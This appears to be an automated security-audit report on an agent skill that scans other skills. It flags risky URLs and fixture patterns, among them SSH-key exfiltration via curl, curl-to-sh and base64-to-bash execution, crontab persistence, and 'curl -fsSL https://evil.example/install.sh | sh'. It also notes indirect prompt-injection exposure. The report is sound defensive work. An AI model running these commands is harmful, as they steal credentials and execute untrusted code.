security-auditor

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 1.00). Yes — these are high-risk: a direct .sh download from an untrusted/placeholder host, an opaque bit.ly shortener that hides the real destination, and an unspecified .tgz from an unknown source are all common vectors for remote code execution and malware distribution.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). The scanner tool is benign, but the bundled test fixtures (tests/fixtures/risky-skill and its scripts) contain explicit high‑risk malicious patterns — e.g., credential exfiltration (cat ~/.ssh/id_rsa piped to curl), remote code execution (curl|sh, base64→bash, chmod+exec), macOS quarantine bypass, malicious postinstall/dependency redirects, and persistence via PATH/crontab — so the package contains definitely malicious examples that would compromise a machine if executed.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.80). The scanner (scripts/scan.js) explicitly walks and reads arbitrary skill directories and files (walkDir + scanFileContent using fs.readFileSync) — including SKILL.md and bundled scripts — so it ingests untrusted, user-provided skill content (which can contain external URLs or embedded instructions) as part of its runtime workflow.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill includes runtime installer commands that fetch-and-execute remote scripts (e.g., "curl -fsSL https://evil.example/install.sh | sh"), which directly runs remote code as part of the skill's required installation steps.